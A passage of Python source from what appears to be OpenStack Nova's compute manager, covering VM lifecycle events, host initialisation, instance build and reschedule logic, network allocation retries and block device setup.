def handle_lifecycle_event(self, event):
LOG.info(_LI("VM %(state)s (Lifecycle Event)"),
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
else:
LOG.warning(_LW("Unexpected power state %d"),
event.get_transition())
if vm_power_state is not None:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
dict(event=event.get_name(),
vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
vm_power_state=vm_power_state),
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
self.driver.register_event_listener(self.handle_events)
def init_host(self):
"""Initialization for a standalone compute service."""
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context())
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (CONF.console_topic, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_rules(security_group_id)
@wrap_exception()
def refresh_security_group_members(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group members.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_members(security_group_id)
@object_compat
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronise the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'security groups.'), instance=instance)
return _sync_refresh()
@wrap_exception()
def refresh_provider_fw_rules(self, context):
"""This call passes straight through to the virtualization driver."""
return self.driver.refresh_provider_fw_rules()
def _get_instance_nw_info(self, context, instance):
"""Get a list of dictionaries of network data of an instance."""
return self.network_api.get_instance_nw_info(context, instance)
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0."),
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
# (3) the configured value is > 0, then the total number attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning(_LW("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s."),
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
try:
decoded = base64.b64decode(contents)
return path, decoded
except TypeError:
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
def _run_instance(self, context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec):
"""Launch a new instance with specified options."""
extra_usage_info = {}
def notify(status, msg="", fault=None, **kwargs):
"""Send a create.{start,error,end} notification."""
type_ = "create.%(status)s" % dict(status=status)
info = extra_usage_info.copy()
info['message'] = msg
self._notify_about_instance_usage(context, instance, type_,
extra_usage_info=info, fault=fault, **kwargs)
try:
self._prebuild_instance(context, instance)
if request_spec and request_spec.get('image'):
image_meta = request_spec['image']
else:
image_meta = {}
extra_usage_info = {"image_name": image_meta.get('name', '')}
notify("start") # notify that build is starting
instance, network_info = self._build_instance(context,
request_spec, filter_properties, requested_networks,
injected_files, admin_password, is_first_time, node,
instance, image_meta, legacy_bdm_in_spec)
notify("end", msg=_("Success"), network_info=network_info)
except exception.RescheduledException as e:
# Instance build encountered an error, and has been rescheduled.
notify("error", fault=e)
except exception.BuildAbortException as e:
            # Instance build was aborted; this is not treated as a failure.
LOG.info(e)
notify("end", msg=e.format_message()) # notify that build is done
except Exception as e:
# Instance build encountered a non-recoverable error:
with excutils.save_and_reraise_exception():
self._set_instance_error_state(context, instance)
notify("error", fault=e) # notify that build failed
def _prebuild_instance(self, context, instance):
self._check_instance_exists(context, instance)
try:
self._start_building(context, instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = _("Instance disappeared before we could start it")
# Quickly bail out of here
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
def _validate_instance_group_policy(self, context, instance,
filter_properties):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# anti-affinity. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. This is a validation step to
# make sure that starting the instance here doesn't violate the policy.
scheduler_hints = filter_properties.get('scheduler_hints') or {}
group_hint = scheduler_hints.get('group')
if not group_hint:
return
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' not in group.policies:
return
group_hosts = group.get_hosts(exclude=[instance.uuid])
if self.host in group_hosts:
msg = _("Anti-affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
_do_validation(context, instance, group_hint)
def _build_instance(self, context, request_spec, filter_properties,
requested_networks, injected_files, admin_password, is_first_time,
node, instance, image_meta, legacy_bdm_in_spec):
original_context = context
context = context.elevated()
# NOTE(danms): This method is deprecated, but could be called,
# and if it is, it will have an old megatuple for requested_networks.
if requested_networks is not None:
requested_networks_obj = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
else:
requested_networks_obj = None
        # If neutron security groups are in use, pass the requested security
        # groups to allocate_for_instance()
if request_spec and self.is_neutron_security_groups:
security_groups = request_spec.get('security_group')
else:
security_groups = []
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node)
network_info = None
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
# b64 decode the files to inject:
injected_files_orig = injected_files
injected_files = self._decode_files(injected_files)
rt = self._get_resource_tracker(node)
try:
limits = filter_properties.get('limits', {})
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(original_context,
instance, requested_networks_obj, macs,
security_groups, dhcp_options)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image_meta,
bdms)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(
context, instance, bdms)
set_access_ip = (is_first_time and
not instance.access_ip_v4 and
not instance.access_ip_v6)
instance = self._spawn(context, instance, image_meta,
network_info, block_device_info,
injected_files, admin_password,
set_access_ip=set_access_ip)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the spawn
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for deleted instance')
LOG.exception(msg, instance=instance)
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=_("Instance disappeared during build"))
except (exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException) as e:
# Don't try to reschedule, just log and reraise.
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.InvalidBDM:
with excutils.save_and_reraise_exception():
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for failed instance')
LOG.exception(msg, instance=instance)
except Exception:
exc_info = sys.exc_info()
# try to re-schedule instance:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
rescheduled = self._reschedule_or_error(original_context, instance,
exc_info, requested_networks, admin_password,
injected_files_orig, is_first_time, request_spec,
filter_properties, bdms, legacy_bdm_in_spec)
if rescheduled:
# log the original build error
self._log_original_error(exc_info, instance.uuid)
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=six.text_type(exc_info[1]))
else:
# not re-scheduling, go to error:
                six.reraise(*exc_info)
# spawn success
return instance, network_info
def _log_original_error(self, exc_info, instance_uuid):
LOG.error(_LE('Error: %s'), exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule_or_error(self, context, instance, exc_info,
requested_networks, admin_password, injected_files, is_first_time,
request_spec, filter_properties, bdms=None,
legacy_bdm_in_spec=True):
"""Try to re-schedule the build or re-raise the original build error to
error out the instance.
"""
original_context = context
context = context.elevated()
instance_uuid = instance.uuid
rescheduled = False
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'instance.create.error', fault=exc_info[1])
try:
LOG.debug("Clean up resource before rescheduling.",
instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._shutdown_instance(context, instance,
bdms, requested_networks)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception:
# do not attempt retry if clean up failed:
with excutils.save_and_reraise_exception():
self._log_original_error(exc_info, instance_uuid)
try:
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties,
legacy_bdm_in_spec)
task_state = task_states.SCHEDULING
rescheduled = self._reschedule(original_context, request_spec,
filter_properties, instance,
self.scheduler_rpcapi.run_instance, method_args,
task_state, exc_info)
except Exception:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
return rescheduled
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
                  {'method': reschedule_method.__name__,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance_uuid, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
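        # A configured instance_build_timeout of 0 disables this check.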
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_error_state(context, instance)
LOG.warning(_LW("Instance build timed out. Set to error "
"state."), instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _start_building(self, context, instance):
"""Save the host and launched_on fields and log appropriately."""
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
self._instance_update(context, instance.uuid,
vm_state=vm_states.BUILDING,
task_state=None,
expected_task_state=(task_states.SCHEDULING,
None))
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn, dhcp_options):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'network_allocate_retries' as 0."),
{'retries': retries})
retries = 0
attempts = retries + 1
retry_time = 1
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
dhcp_options=dhcp_options)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception(_LE('Instance failed network setup '
'after %(attempts)d attempt(s)'),
log_info)
                    six.reraise(*exc_info)
LOG.warning(_LW('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)'),
log_info, instance=instance)
time.sleep(retry_time)
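                # Back off exponentially between retries, capped at 30s.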
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
            # NOTE(alex_xu): network_allocated being True means the network
            # resources were already allocated during a previous scheduling
            # attempt and the setup on that host has since been cleaned up.
            # After rescheduling, the network resources need to be set up
            # again on the new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self._get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups, dhcp_options)
if not instance.access_ip_v4 and not instance.access_ip_v6:
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
network_name = CONF.default_access_ip_network_name
if not network_name:
return network_info
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
instance.save()
break
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups, dhcp_options):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
self._update_resource_tracker(context, instance)
is_vpn = pipelib.is_vpn_image(instance.image_ref)
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn,
dhcp_options)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _default_block_device_names(self, context, instance,
image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
        It also ensures that there is a root_device_name and that it is set
        to the first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
ephemerals = filter(block_device.new_format_is_ephemeral,
block_devices)
swap = filter(block_device.new_format_is_swap,
block_devices)
block_device_mapping = filter(
driver_block_device.is_block_device_mapping, block_devices)
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _prep_block_device(self, context, instance, bdms,
do_check_attach=True):
"""Set up the block device for an instance with error logging."""
try:
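            # Assemble the driver block_device_info dict: swap and ephemeral
            # BDMs are converted directly, while volume, snapshot, image and
            # blank BDMs are attached (the latter three wait for the backing
            # volume to be created first).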
block_device_info = {
'root_device_name': instance.root_device_name,
'swap': driver_block_device.convert_swap(bdms),
'ephemerals': driver_block_device.convert_ephemerals(bdms),
'block_device_mapping': (
driver_block_device.attach_block_devices(
driver_block_device.convert_volumes(bdms),
context, instance, self.volume_api,
self.driver, do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_snapshots(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_images(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_blanks(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach))
}
if self.use_legacy_block_device_info:
for bdm_type in ('swap', 'ephemerals', 'block_device_mapping'):
block_device_info[bdm_type] = \
driver_block_device.legacy_block_devices(
block_device_info[bdm_type])
# Get swap out of the list
block_device_info['swap'] = driver_block_device.get_swap(
block_device_info['swap'])
return block_device_info
except exception.OverQuota:
msg = _LW('Failed to create block device for instance due to '
'being over volume resource quota')
            LOG.warning(msg, instance=instance)
raise exception.InvalidBDM()
except Exception:
LOG.exception(_LE('Instance failed block device setup'),
instance=instance)
raise exception.InvalidBDM()
def _update_instance_after_spawn(self, context, instance):
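        # Record the post-spawn state of the instance: current power state
        # from the hypervisor, ACTIVE vm_state, launch timestamp and config
        # drive information.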
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
@object_compat
def _spawn(self, context, instance, image_meta, network_info,
block_device_info, injected_files, admin_password,
set_access_ip=False):
"""Spawn an instance with error logging and update its power state."""
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
instance.save(expected_task_state=task_states.BLOCK_DEVICE_MAPPING)
try:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
network_info,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
self._update_instance_after_spawn(context, instance)
def _set_access_ip_values():
"""Add access ip values for a given instance.
If CONF.default_access_ip_network_name is set, this method will
grab the corresponding network and set the access ip values
accordingly. Note that when there are multiple ips to choose
from, an arbitrary one will be chosen.
"""
network_name = CONF.default_access_ip_network_name
if not network_name:
return
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
return
if set_access_ip:
_set_access_ip_values()
network_info.wait(do_raise=True)
instance.info_cache.network_info = network_info
# NOTE(JoshNang) This also saves the changes to the instance from
# _allocate_network_async, as they aren't saved in that function
# to prevent races.
instance.save(expected_task_state=task_states.SPAWNING)
return instance
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, objects.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
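        """Periodically send the scheduler the full list of instance UUIDs
        on this host so it can resynchronize its view of the host.
        """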
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
LOG.debug('Deallocating network for instance', instance=instance)
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
swap = driver_block_device.convert_swap(bdms)
ephemerals = driver_block_device.convert_ephemerals(bdms)
block_device_mapping = (
driver_block_device.convert_volumes(bdms) +
driver_block_device.convert_snapshots(bdms) +
driver_block_device.convert_images(bdms))
if not refresh_conn_info:
            # If the block_device_mapping has no value in connection_info
            # (returned as None), don't include it in the mapping.
block_device_mapping = [
bdm for bdm in block_device_mapping
if bdm.get('connection_info')]
else:
block_device_mapping = driver_block_device.refresh_conn_infos(
block_device_mapping, context, instance, self.volume_api,
self.driver)
if self.use_legacy_block_device_info:
swap = driver_block_device.legacy_block_devices(swap)
ephemerals = driver_block_device.legacy_block_devices(ephemerals)
block_device_mapping = driver_block_device.legacy_block_devices(
block_device_mapping)
# Get swap out of the list
swap = driver_block_device.get_swap(swap)
root_device_name = instance.get('root_device_name')
return {'swap': swap,
'root_device_name': root_device_name,
'ephemerals': ephemerals,
'block_device_mapping': block_device_mapping}
# NOTE(mikal): No object_compat wrapper on this method because its
# callers all pass objects already
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
# NOTE(danms): Remove this in v4.0 of the RPC API
if (requested_networks and
not isinstance(requested_networks,
objects.NetworkRequestList)):
requested_networks = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
# NOTE(melwitt): Remove this in v4.0 of the RPC API
flavor = filter_properties.get('instance_type')
if flavor and not isinstance(flavor, objects.Flavor):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
flavor = objects.Flavor.get_by_id(context, flavor['id'])
filter_properties = dict(filter_properties, instance_type=flavor)
# NOTE(sahid): Remove this in v4.0 of the RPC API
if (limits and 'numa_topology' in limits and
isinstance(limits['numa_topology'], six.string_types)):
db_obj = jsonutils.loads(limits['numa_topology'])
limits['numa_topology'] = (
objects.NUMATopologyLimits.obj_from_db_obj(db_obj))
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._build_semaphore:
self._do_build_and_run_instance(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
utils.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits)
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
node=None, limits=None):
try:
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
try:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
retry['exc'] = traceback.format_exception(*sys.exc_info())
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
if self.driver.deallocate_networks_on_reschedule(instance):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
# NOTE(alex_xu): Network already allocated and we don't
# want to deallocate them before rescheduling. But we need
# cleanup those network resource setup on this host before
# rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
instance.task_state = task_states.SCHEDULING
instance.save()
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping)
return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
except Exception as e:
# Should not reach here.
msg = _LE('Unexpected build failure, not rescheduling build.')
LOG.exception(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties):
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
try:
rt = self._get_resource_tracker(node)
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
with self._build_resources(context, instance,
requested_networks, security_groups, image,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
